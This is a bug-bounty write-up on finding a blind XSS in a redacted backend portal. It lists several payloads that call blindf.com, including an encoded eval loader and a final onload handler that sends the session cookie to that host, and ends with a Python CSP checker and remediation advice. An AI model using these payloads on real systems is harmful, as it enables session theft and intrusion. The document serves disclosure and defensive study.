Blind XSS (A mind game to win the battle)

In this write-up, I will explain how I exploited a blind XSS in the backend portal of a program.

I will not take much time and will keep the write-up simple and to the point.

It was a private program, so we will call it https://redacted.com.

I used https://blindf.com to exploit it. It's a platform/tool/framework for finding blind XSS.

The attack starts:

1. I found a form on https://redacted.com
2. I put a BHTML payload + BXSS payload in the text field

Payload:

<img src="https://blindf.com/b.php?c=redacted_bhtml_execution"/>"></script><script src=https://blindf.com/bx.php></script>

Result: The WAF stopped me from submitting the form.

3. I removed the BXSS payload. Now the payload was:

Payload:

<img src="https://blindf.com/b.php?c=redacted_bhtml_execution"/>

Result: The WAF did not stop me and I successfully submitted the form. The next day, Blindf confirmed the BHTML payload execution in the backend. Now it was time to submit the BXSS payload, because I knew that the backend portal was vulnerable and I just had to submit the BXSS payload.

4. Next payload used: BHTML + BXSS

Payload:

<img src="https://blindf.com/b.php?c=redacted_bhtml_execution"/>"><svg onload='with(top)body.appendChild(createElement("script")).src="https://blindf.com/bx.php"'>

Result: The WAF did not stop me and I successfully submitted the payload. But again only the BHTML payload worked and the BXSS payload did not. Now, again, it was time to modify the payload.

5. Next payload used: BHTML + BXSS

Payload:

<img src="https://blindf.com/b.php?c=redacted_bhtml_execution"/>">   sfds"><base href="https://blindf.com"><script nonce='secret' src='./bx.php'></script>

Result: The WAF stopped me and I could not submit the form. Frustration was at its peak. Again it was time to change the payload.

6. Next payload used: BHTML + BXSS

Payload:

<img src="https://blindf.com/b.php?c=redacted_bhtml_execution"/>">"><img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vYmxpbmRmLmNvbS9ieC5waHAiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7 onerror=eval(atob(this.id))>

Result: Bypassed the WAF, but again only the BHTML payload worked and the BXSS payload failed. Now it was not the time for payload modification but for thinking about the situation.

Situation step by step:

  • I used BHTML + BXSS payloads.
  • Some BXSS payloads bypassed the WAF but did not execute in the backend portal, whereas the BHTML payloads were going well and I was receiving responses from them.
  • Maybe something was stopping my remote JS file from executing. [CORS or Same-origin policy]
  • So I had to execute BXSS without including a remote JS file.
  • But how could I confirm the payload execution in the backend if I just showed an alert popup to them?
  • The "<img" tag was working, but I could not include a remote JS file.
  • I had to make a payload that could respond back and confirm JS code execution.

7. Now it was time to modify the payload and attack again.

Payload used:

<img src="https://blindf.com/b.php?c=redacted_bhtml_execution"/>">  <img src=https://blindf.com/a.jpg onload=this.src='https://blindf.com/oc.php/?c='+document.cookie>

Result: WAF bypassed. The BHTML payload executed. The BXSS payload executed and I got the cookie value.
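The pattern above (remote script blocked, inline onload handler allowed, image request to an external host allowed) is exactly what a Content Security Policy of the shape script-src 'self' 'unsafe-inline' with no img-src restriction produces; the author attributes it to CORS or the same-origin policy, and the write-up does not confirm which mechanism was actually in play, so treating it as CSP is an assumption. The checker below is an added example, not code from the write-up or from Blindf: it implements simplified CSP source matching (no nonces, hashes or 'strict-dynamic'), uses a constructed stand-in for the redacted portal origin, and evaluates each load type the payloads relied on against that permissive policy and against a stricter one that would have blocked all three.

```python
from urllib.parse import urlsplit

def parse_csp(header: str) -> dict:
    """Split a Content-Security-Policy header into {directive: [source tokens]}."""
    policy = {}
    for chunk in header.split(";"):
        parts = chunk.split()
        if parts:
            policy[parts[0].lower()] = [p.lower() for p in parts[1:]]
    return policy

def csp_allows(header: str, page_origin: str, directive: str, load: str) -> bool:
    """Simplified CSP check. 'load' is the URL a fetch directive would load, or the word
    'inline' for an inline <script> or on* handler. Nonces, hashes and 'strict-dynamic' are ignored."""
    policy = parse_csp(header)
    sources = policy.get(directive, policy.get("default-src"))
    if sources is None:  # neither the directive nor default-src is set: unrestricted
        return True
    if load == "inline":
        return "'unsafe-inline'" in sources
    target, page = urlsplit(load), urlsplit(page_origin)
    for src in sources:
        if src == "*":
            return True
        if src == "'self'":
            if (target.scheme, target.netloc) == (page.scheme, page.netloc):
                return True
        elif not src.startswith("'"):  # host source, e.g. cdn.example or https://cdn.example
            host = urlsplit(src if "://" in src else f"{target.scheme}://{src}")
            if (host.scheme, host.netloc) == (target.scheme, target.netloc):
                return True
    return False

PORTAL = "https://portal.redacted.example"  # constructed stand-in for the redacted backend origin
# The load types the write-up's payloads depended on, with the directive that governs each.
LOADS = {
    "remote script from blindf.com (steps 3 to 6)": ("script-src", "https://blindf.com/bx.php"),
    "inline onload handler (step 7)": ("script-src", "inline"),
    "image request to blindf.com (BHTML probe, step 7 beacon)": ("img-src", "https://blindf.com/b.php"),
}
# Reproduces the pattern the author saw (an assumption, not confirmed by the write-up):
# remote scripts blocked, inline handlers allowed, images from any host allowed.
PERMISSIVE = "script-src 'self' 'unsafe-inline'"
# Blocks all three; pair it with output encoding and an HttpOnly session cookie.
STRICT = "default-src 'self'; script-src 'self'; img-src 'self'"

def evaluate(header: str) -> dict:
    """Map each load type to whether the given policy lets it through."""
    return {name: csp_allows(header, PORTAL, d, load) for name, (d, load) in LOADS.items()}
```

Note that even STRICT only contains the damage: the root fix is encoding the stored field at the point where the portal renders it, and marking the session cookie HttpOnly so document.cookie has nothing to hand over.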

Severity: Critical (9 ~ 10)

Bounty: $1000
